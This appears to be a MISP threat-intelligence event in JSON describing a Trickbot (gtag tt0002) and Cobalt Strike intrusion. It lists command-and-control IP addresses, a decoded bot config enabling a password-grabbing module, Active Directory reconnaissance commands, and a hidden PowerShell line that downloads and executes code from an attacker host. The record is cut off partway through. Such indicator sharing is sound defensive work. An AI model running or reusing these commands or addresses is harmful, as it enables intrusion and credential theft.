misp-circl-feed/feeds/circl/misp/5e70a28a-d97c-47f6-a229-40990a0a020f.json

1449 lines
756 KiB
JSON
Raw Normal View History

2023-04-21 13:25:09 +00:00
{
"Event": {
"analysis": "0",
"date": "2020-03-17",
"extends_uuid": "",
"info": "Trickbot Gtag lib693/tt0002",
"publish_timestamp": "1593748782",
"published": true,
"threat_level_id": "3",
"timestamp": "1621850733",
"uuid": "5e70a28a-d97c-47f6-a229-40990a0a020f",
"Orgc": {
"name": "laskowski-tech.com",
"uuid": "5e157d76-c92c-4acd-a54e-4a01950d210f"
},
"Tag": [
{
"colour": "#0ab4a7",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "Cobalt Strike",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#0088cc",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "misp-galaxy:malpedia=\"TrickBot\"",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#ffffff",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "tlp:white",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
],
"Attribute": [
{
"category": "Network activity",
"comment": "On port 443",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440871",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f0-6724-42d1-98b0-446f74656a8a",
"value": "5.182.210.226|443",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 443",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-aab8-402e-b421-4bd074656a8a",
"value": "192.210.226.106|443",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 443",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-c5d8-4878-819f-42e974656a8a",
"value": "51.254.164.244|443",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 443",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-6fb8-49f1-857e-48e574656a8a",
"value": "45.148.120.153|443",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 443",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-c5c0-4f9c-a390-44d174656a8a",
"value": "195.123.239.67|443",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 443",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-f7e4-4282-8d69-47a274656a8a",
"value": "194.5.250.150|443",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 443",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-6578-48eb-84a0-45c174656a8a",
"value": "217.12.209.200|443",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 443",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-d5ac-4066-845e-4bec74656a8a",
"value": "185.99.2.221|443",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 443",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-a65c-4298-ab55-47e974656a8a",
"value": "51.254.164.245|443",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 443",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-4374-4583-a321-4c2774656a8a",
"value": "185.62.188.159|443",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 443",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-f674-43e8-8460-4a2474656a8a",
"value": "46.17.107.65|443",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 443",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-10a0-4465-b424-4a3074656a8a",
"value": "185.20.185.76|443",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 443",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-4550-4d05-91e0-497974656a8a",
"value": "185.203.118.37|443",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 443",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-0f94-4075-9550-4a7074656a8a",
"value": "146.185.253.178|443",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 443",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-52b8-4639-8568-4ad274656a8a",
"value": "185.14.31.252|443",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 443",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-8da8-47cf-ada7-4d7274656a8a",
"value": "185.99.2.115|443",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 443",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-6490-4fde-b15b-4fe274656a8a",
"value": "172.245.156.138|443",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 443",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440871",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-e478-43e0-8336-4fe074656a8a",
"value": "51.89.73.158|443",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-020c-4fbf-b4a0-488a74656a8a",
"value": "190.214.13.2|449",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-f38c-4dd9-a3f9-4b3374656a8a",
"value": "181.140.173.186|449",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-860c-47fb-8aa8-4d6574656a8a",
"value": "181.129.104.139|449",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-2780-4a1d-87ac-480874656a8a",
"value": "181.113.28.146|449",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-b0fc-481b-86f6-4de574656a8a",
"value": "181.112.157.42|449",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-7d68-425d-82d6-45a674656a8a",
"value": "170.84.78.224|449",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-059c-4637-b10d-4cdf74656a8a",
"value": "200.21.51.38|449",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-c28c-46bf-b7fb-493874656a8a",
"value": "46.174.235.36|449",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-fd44-4949-80c1-434174656a8a",
"value": "36.89.85.103|449",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-a5e4-4e3e-bb6f-457d74656a8a",
"value": "181.129.134.18|449",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-15fc-44b3-bd10-4a6a74656a8a",
"value": "186.71.150.23|449",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-91b0-4aa1-920b-4b2974656a8a",
"value": "131.161.253.190|449",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-498c-40f6-8ef1-46e874656a8a",
"value": "200.127.121.99|449",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-f290-41ad-9ab3-461674656a8a",
"value": "114.8.133.71|449",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-c434-4f05-9cc8-4f5574656a8a",
"value": "119.252.165.75|449",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-b7d4-48c7-9f26-49e274656a8a",
"value": "121.100.19.18|449",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-e7e4-4dba-b99d-4eb374656a8a",
"value": "202.29.215.114|449",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-549c-470e-a6de-465f74656a8a",
"value": "180.180.216.177|449",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-1278-4b1b-8bb6-40f874656a8a",
"value": "171.100.142.238|449",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-c438-4004-88c9-495a74656a8a",
"value": "186.232.91.240|449",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "On port 449",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440870",
"to_ids": true,
"type": "ip-dst|port",
"uuid": "5e70a5f2-9a68-4b61-b682-4f4674656a8a",
"value": "181.196.207.202|449",
"Tag": [
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#991515",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "trickbot",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584440983",
"to_ids": true,
"type": "ip-dst",
"uuid": "5e70a685-4150-4cad-be79-4eb70a0a020f",
"value": "66.42.99.79",
"Tag": [
{
"colour": "#0ab4a7",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "Cobalt Strike",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#e200a3",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Command and Control",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Support Tool",
"comment": "decoded trickbot config using https://github.com/hasherezade/malware_analysis/tree/master/trickbot",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584441141",
"to_ids": false,
"type": "text",
"uuid": "5e70a70a-34cc-4e93-9307-46120a0a020f",
"value": "./trick_settings_decoder.py --brute --file ~/Downloads/settings.ini\r\nSearching the charset...\r\n\r\n[+] Decoded with matching charset: HJIA/CB+FGKLNOP3RSlUVWXYZfbcdeaghi5kmn0pqrstuvwx89o1246jMQDz7ETy\r\n\r\n<mcconf>\r\n<ver>1000503</ver>\r\n<gtag>tt0002</gtag>\r\n<servs>\r\n<srv>5.182.210.226:443</srv>\r\n<srv>192.210.226.106:443</srv>\r\n<srv>51.254.164.244:443</srv>\r\n<srv>45.148.120.153:443</srv>\r\n<srv>195.123.239.67:443</srv>\r\n<srv>194.5.250.150:443</srv>\r\n<srv>217.12.209.200:443</srv>\r\n<srv>185.99.2.221:443</srv>\r\n<srv>51.254.164.245:443</srv>\r\n<srv>185.62.188.159:443</srv>\r\n<srv>46.17.107.65:443</srv>\r\n<srv>185.20.185.76:443</srv>\r\n<srv>185.203.118.37:443</srv>\r\n<srv>146.185.253.178:443</srv>\r\n<srv>185.14.31.252:443</srv>\r\n<srv>185.99.2.115:443</srv>\r\n<srv>172.245.156.138:443</srv>\r\n<srv>51.89.73.158:443</srv>\r\n<srv>190.214.13.2:449</srv>\r\n<srv>181.140.173.186:449</srv>\r\n<srv>181.129.104.139:449</srv>\r\n<srv>181.113.28.146:449</srv>\r\n<srv>181.112.157.42:449</srv>\r\n<srv>170.84.78.224:449</srv>\r\n<srv>200.21.51.38:449</srv>\r\n<srv>46.174.235.36:449</srv>\r\n<srv>36.89.85.103:449</srv>\r\n<srv>181.129.134.18:449</srv>\r\n<srv>186.71.150.23:449</srv>\r\n<srv>131.161.253.190:449</srv>\r\n<srv>200.127.121.99:449</srv>\r\n<srv>114.8.133.71:449</srv>\r\n<srv>119.252.165.75:449</srv>\r\n<srv>121.100.19.18:449</srv>\r\n<srv>202.29.215.114:449</srv>\r\n<srv>180.180.216.177:449</srv>\r\n<srv>171.100.142.238:449</srv>\r\n<srv>186.232.91.240:449</srv>\r\n<srv>181.196.207.202:449</srv>\r\n</servs>\r\n<autorun>\r\n<module name=\"pwgrab\"/>\r\n</autorun>\r\n</mcconf>"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584441521",
"to_ids": true,
"type": "url",
"uuid": "5e70a89e-79d0-4f1c-a597-4cf50a0a020f",
"value": "http://66.42.99.79:80/q",
"Tag": [
{
"colour": "#0ab4a7",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "Cobalt Strike",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
},
{
"colour": "#8a0064",
2023-05-19 09:05:37 +00:00
"local": "0",
"name": "kill-chain:Delivery",
"relationship_type": ""
2023-04-21 13:25:09 +00:00
}
]
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584441608",
"to_ids": false,
"type": "text",
"uuid": "5e70a908-11b4-4fcd-a31c-4b380a0a020f",
"value": "%WINDIR%\\system32\\cmd.exe /C net group \"enterprise admins\" /domain"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584441628",
"to_ids": false,
"type": "text",
"uuid": "5e70a91c-ba40-44f8-a6a4-4b360a0a020f",
"value": "%WINDIR%\\system32\\cmd.exe /C net group \"domain admins\" /domain"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584441700",
"to_ids": false,
"type": "text",
"uuid": "5e70a964-6484-4ac5-a73b-40b40a0a020f",
"value": "%WINDIR%\\system32\\net1 config workstation"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584441756",
"to_ids": false,
"type": "text",
"uuid": "5e70a99c-07a4-4eae-8027-421b0a0a020f",
"value": "%WINDIR%\\System32\\cmd.exe /c nltest /domain_trusts"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584441800",
"to_ids": false,
"type": "text",
"uuid": "5e70a9c8-27d8-4d27-a2c6-43b00a0a020f",
"value": "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://66.42.99.79:80/q'))\""
},
{
"category": "External analysis",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584443507",
"to_ids": false,
"type": "link",
